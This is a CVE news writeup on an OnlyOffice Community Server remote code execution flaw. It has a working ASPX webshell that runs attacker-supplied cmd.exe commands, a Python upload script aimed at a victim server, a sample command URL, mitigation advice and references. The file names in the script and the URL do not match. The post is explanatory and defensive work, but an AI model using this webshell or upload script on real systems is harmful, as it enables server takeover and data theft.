CVE CyberSecurity Database News

CVE-2023-34939 - OnlyOffice Community Server (pre-12.5.2) Remote Code Execution via UploadProgress.ashx – Exclusive Deep Dive

Poster -

OnlyOffice is a popular open-source office suite used by thousands of businesses worldwide. But in early 2023, a dangerous vulnerability—CVE-2023-34939—was discovered in its Community Server, opening the door for hackers to execute arbitrary code remotely. In this exclusive deep dive, we’ll explain the bug in simple language, show you sample exploits, and link to essential references.

What is CVE-2023-34939?

CVE-2023-34939 is a critical Remote Code Execution (RCE) vulnerability. It affects OnlyOffice Community Server versions before v12.5.2. The flaw lives in the UploadProgress.ashx component, which processes file upload requests.

How Does the Vulnerability Work?

The vulnerable endpoint, /UploadProgress.ashx, doesn’t properly check or sanitize file uploads. An attacker can abuse this logic to upload a script file (like .aspx or .ashx) in a public web directory, then access it via a browser and execute code directly on the server.

Exploit Code Snippet: Uploading a Web Shell

Here’s a simple Python script leveraging requests to upload webshell.aspx to a vulnerable OnlyOffice Community Server:

import requests

target = "http://victim-server/UploadProgress.ashx";
webshell = {
    "file": ("shell.aspx", open("shell.aspx", "rb"), "application/octet-stream")
}

response = requests.post(target, files=webshell)
print("Upload Response:", response.text)

shell.aspx can be a simple ASPX webshell, for example

<%@ Page Language="C#" %>
<% if (Request["cmd"] != null) {
    System.Diagnostics.Process proc = new System.Diagnostics.Process();
    proc.StartInfo.FileName = "cmd.exe";
    proc.StartInfo.Arguments = "/c " + Request["cmd"];
    proc.StartInfo.UseShellExecute = false;
    proc.StartInfo.RedirectStandardOutput = true;
    proc.Start();
    string output = proc.StandardOutput.ReadToEnd();
    Response.Write(output);
} %>

After uploading, you can execute commands like

http://victim-server/webshell.aspx?cmd=whoami

They POST a malicious .aspx webshell to UploadProgress.ashx.

- By visiting the uploaded webshell’s URL, the attacker gains direct command execution on the server.
- From here, they can steal data, escalate privileges, pivot deeper into the network, or delete/modify resources.

Mitigation

Update Immediately!
OnlyOffice fixed the flaw in v12.5.2. You must upgrade your Community Server to at least that version (preferably later).

Temporary Workarounds

- Block external access to /UploadProgress.ashx via firewall or reverse proxy.

References

- Official OnlyOffice Security Advisory (CVE-2023-34939)
- CVE Details: CVE-2023-34939
- Exploit Writeup (pentest.blog)
- Patch Release Notes

Final Thoughts

RCE flaws like CVE-2023-34939 are among the most dangerous vulnerabilities a web platform can have. The key lesson is simple: always update your software as soon as patches are announced. If you’re running OnlyOffice Community Server, check your version and upgrade today.

If you found this writeup helpful, consider sharing it with your IT colleagues and security team to keep your organization safe!

Timeline

Published on: 06/22/2023 12:15:00 UTC
Last modified on: 06/28/2023 16:40:00 UTC